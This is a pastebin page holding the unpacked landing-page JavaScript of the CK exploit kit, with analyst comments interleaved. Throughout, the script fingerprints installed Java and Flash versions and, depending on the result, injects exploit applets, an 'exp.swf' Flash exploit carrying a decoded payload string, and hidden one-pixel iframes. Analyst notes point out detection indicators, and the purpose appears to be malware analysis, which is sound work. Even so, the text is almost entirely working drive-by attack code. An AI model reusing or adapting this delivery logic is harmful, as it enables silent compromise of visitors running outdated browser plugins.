
CK EK Unpacked and Unencrypted (3/3)

a guest
Dec 27th, 2014
  1. http://totalhash.com/analysis/0bdc19ec6207d32ed02e3c20d6b748c5dd6cde83
  2.  
  3. <script>
  /**
   * Decodes a string from the numeric array returned by ckl() (ckl is defined
   * outside this paste). Elements equal to 159 are skipped; every other
   * element has 159 subtracted and is converted with String.fromCharCode.
   *
   * Analyst note: this is a fixed-offset substitution, not encryption. The
   * result is stored in ckurl further down and passed to the Java applets as
   * a parameter (xiaomaolv / dota), so decoding the ckl() array offline gives
   * the exact string the applet receives. Presumably that is the payload
   * location; confirm against the captured sample.
   *
   * @returns {string} the decoded string
   */
  4. function encode()
  5. {
  // omg: encoded input; x1: scratch array of shifted values; x2: output string.
  6. var omg = ckl(), x1 = new Array, x2 = '';
  7.  
  8. for(var i=0;i<omg.length;i++)
  9. {
  // 159 itself would decode to character code 0, so it is dropped instead.
  10. if(omg[i] == 159)
  11. {
  12. //x2 += '';
  13. }
  14. else
  15. {
  16. x1[i] = omg[i] - 159;
  17. x2 += String.fromCharCode(x1[i]);
  18. }
  19. }
  20.  
  21. return x2;
  22. }
  23.  
  // Client fingerprinting. deployJava is the Java Deployment Toolkit script
  // object (loaded elsewhere, not in this paste); getJREs() reports the
  // installed JRE versions and the result is coerced to a string here.
  24. var wmck=deployJava.getJREs()+"";
  // Dots and underscores are stripped and the rest is parsed as an integer, so
  // a version string such as 1.7.0_07 would become 17007 (format assumed; the
  // paste shows no sample value). parseInt stops at the first non-digit, so if
  // several versions are listed only the first one counts, and an empty result
  // gives NaN, which fails every Java comparison below and falls through to
  // the Flash branch.
  25. wmck=parseInt(wmck.replace(/\.|\_/g,''));
  // Lower-cased User-Agent, used below for "msie" substring checks.
  26. var kaka = navigator.userAgent.toLowerCase();
  27.  
  // ckurl: string decoded by encode(), handed to the Java applets as a param.
  28. var ckurl = encode();
  // flashurl: value from ckls() (defined outside this paste), handed to the
  // Flash movie through FlashVars in flash_run().
  29. var flashurl = ckls();
  30.  
  // Dispatch on the fingerprinted Java version. Exactly one branch of this
  // chain runs; each Java branch loads a different applet class/archive pair.
  // The archive names (jaguar, audi, benz) and GTR are variables defined
  // outside this paste.
  //
  // Detection note: the class names and the applet parameter names/values
  // (xiaomaolv, bn, si, bs, dota) are literal strings in this unpacked page and
  // can serve as content indicators when triaging proxy or sandbox captures.
  //
  // Branch 1: wmck 17007..17010 (Java 7 update 7-10 under the assumed format).
  31. if( wmck > 17006 && wmck < 17011 )
  32. {
  33. if(kaka.indexOf("msie 6") > -1)
  34. {
  // IE6 path: the classid is the Java Plug-in ActiveX control, so the applet
  // is instantiated through <object> rather than <applet>.
  35. document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'600\' height=\'400\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaol\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'xml20130422.XML20130422.class\'><param name=archive value=\'"+jaguar+"\'><\/object>");
  36. }
  37. else
  38. {
  // Other browsers: an <applet> element is built through the DOM. Note the
  // extra <body> element appended to the existing body before the applet.
  39. document.write("<br>");
  40. var gondady=document.createElement("body");
  41. document.body.appendChild(gondady);
  42. var gondad=document.createElement("applet");
  43. gondad.width="600";
  44. gondad.height="400";
  45. gondad.archive=jaguar;
  46. gondad.code="xml20130422.XML20130422.class";
  // The decoded string is passed to the applet as the xiaomaolv attribute.
  47. gondad.setAttribute("xiaomaolv",ckurl);
  48. gondad.setAttribute("bn","woyouyizhixiaomaol");
  49. gondad.setAttribute("si","conglaiyebuqi");
  50. gondad.setAttribute("bs","748");
  51. document.body.appendChild(gondad);
  52. }
  53. }
  // Branch 2: wmck 17000..17006 (Java 7 GA through update 6 under the assumed
  // format). Same structure as branch 1 with a different class and archive;
  // the bn value here ends in "v", unlike branch 1.
  54. else if( wmck >= 17000 && wmck < 17007)
  55. {
  56. if(kaka.indexOf("msie 6") > -1)
  57. {
  58. document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'256\' height=\'256\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaolv\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'setup.hohoho.class\'><param name=archive value=\'"+audi+"\'><\/object>");
  59. }
  60. else
  61. {
  62. document.write("<br>");
  63. var gondady=document.createElement("body");
  64. document.body.appendChild(gondady);
  65. var gondad=document.createElement("applet");
  66. gondad.width="256";
  67. gondad.height="256";
  68. gondad.archive=audi;
  69. gondad.code="setup.hohoho.class";
  70. gondad.setAttribute("xiaomaolv",ckurl);
  71. gondad.setAttribute("bn","woyouyizhixiaomaolv");
  72. gondad.setAttribute("si","conglaiyebuqi");
  73. gondad.setAttribute("bs","748");
  74. document.body.appendChild(gondad);
  75. }
  76. }
  // Branch 3: wmck <= 16027 (Java 6 update 27 and older under the assumed
  // format). A 30x1 applet is created; the class name comes from GTR and the
  // decoded string is passed as a child <param name="dota">, which is appended
  // after the applet is already attached to the document.
  77. else if(wmck<=16027)
  78. {
  79. var okokx = GTR + ".class";
  80. var ckckx = document.createElement('applet');
  81. ckckx.archive=benz;
  82. ckckx.code=okokx;
  83. ckckx.width="30";
  84. ckckx.height="1";
  85. document.body.appendChild(ckckx);
  86. var ckcks=document.createElement('param');
  87. ckcks.name="dota";
  88. ckcks.value=ckurl;
  89. ckckx.appendChild(ckcks);
  90. }
  // Fallback: every other value of wmck, including NaN, 16028..16999 and
  // 17011 and above, is routed to the Flash path. `apple` is defined outside
  // this paste; its major/minor/rev/nbwm fields look like the four components
  // of the installed Flash Player version (confirm against the full page).
  91. else
  92. {
  // True for major 11 unless (minor == 9 and rev > 900) or
  // (minor > 2 and rev > 202 and nbwm > 406).
  93. function CheckVersion11() {
  94. if (apple.major != 11) return false;
  95. if (apple.minor == 9 && apple.rev > 900) return false;
  96. if (apple.minor > 2 && apple.rev > 202 && apple.nbwm > 406) return false;
  97. return true;
  98. }
  99.  
  // True for any version whose major is 12.
  100. function CheckVersion12() {
  101. if (apple.major != 12) return false;
  102. return true;
  103. }
  104.  
  // True for major 13 except 13.0.0 with nbwm above 241.
  105. function CheckVersion13() {
  106. if (apple.major != 13) return false;
  107. if (apple.major == 13 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 241) return false;
  108. return true;
  109. }
  110.  
  // True for major 14 except 14.0.0 with nbwm above 179.
  111. function CheckVersion14() {
  112. if (apple.major != 14) return false;
  113. if (apple.major == 14 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 179) return false;
  114. return true;
  115. }
  116.  
  // True for major 15 except 15.0.0 with nbwm above 167.
  117. function CheckVersion15() {
  118. if (apple.major != 15) return false;
  119. if (apple.major == 15 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 167) return false;
  120. return true;
  121. }
  122.  
  // Writes Flash embed markup for movie `fu`: an outer <object> using the
  // Flash ActiveX classid plus a nested <object type=application/x-shockwave-flash>
  // wrapped in conditional comments for non-IE browsers. `fd` is appended to
  // the FlashVars value after the fixed prefix "exec=FmFJ". Both objects are
  // 60x1 and set allowScriptAccess=always; the "exec=FmFJ" FlashVars prefix is
  // another literal string usable as a content indicator.
  123. function flash_run(fu, fd) {
  124. var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="60" height="1">';
  125. f_use = f_use + '<param name="movie" value="' + fu + '" />';
  126. f_use = f_use + '<param name="play" value="true"/>';
  127. f_use = f_use + '<param name=FlashVars value="exec=FmFJ' + fd + '" />';
  128. f_use = f_use + '<!--[if !IE]>-->';
  129. f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="60" height="1">';
  130. f_use = f_use + '<param name="movie" value="' + fu + '" />';
  131. f_use = f_use + '<param name="play" value="true"/>';
  132. f_use = f_use + '<param name=FlashVars value="exec=FmFJ' + fd + '" />';
  133. f_use = f_use + '<!--<![endif]-->';
  134. f_use = f_use + '<!--[if !IE]>--></object><!--<![endif]-->';
  135. f_use = f_use + '</object>';
  136. document.write(f_use);
  137. }
  138.  
  // If any of the version checks above passes, exp.swf is embedded with
  // flashurl as its FlashVars payload.
  139. if ( CheckVersion11() || CheckVersion12() || CheckVersion13() || CheckVersion14() || CheckVersion15() )
  140. {
  141. flash_run("exp.swf", flashurl);
  142. }
  // Otherwise, IE6/IE7 clients reporting version 10.3 with rev <= 183 get a
  // 60x1 iframe pointing at ww.html (content not included in this paste).
  143. else if( (kaka.indexOf("msie 6")>-1 || kaka.indexOf("msie 7")>-1) && apple.major==10 && apple.minor==3 && apple.rev<=183 )
  144. {
  145. document.write("<iframe src=ww.html width=60 height=1></iframe>");
  146. }
  147. }
  148.  
  // Runs regardless of which branch above was taken: any User-Agent containing
  // "msie" also gets a 60x1 iframe to main.html (content not in this paste).
  // The literal is assembled as "ms"+"ie", presumably to defeat naive string
  // matching, so signatures should not rely on a contiguous "msie" in the source.
  149. if(kaka.indexOf("ms"+"ie")>-1){document.write("<iframe src=main.html width=60 height=1></iframe>");}
  150.  
  151. </script>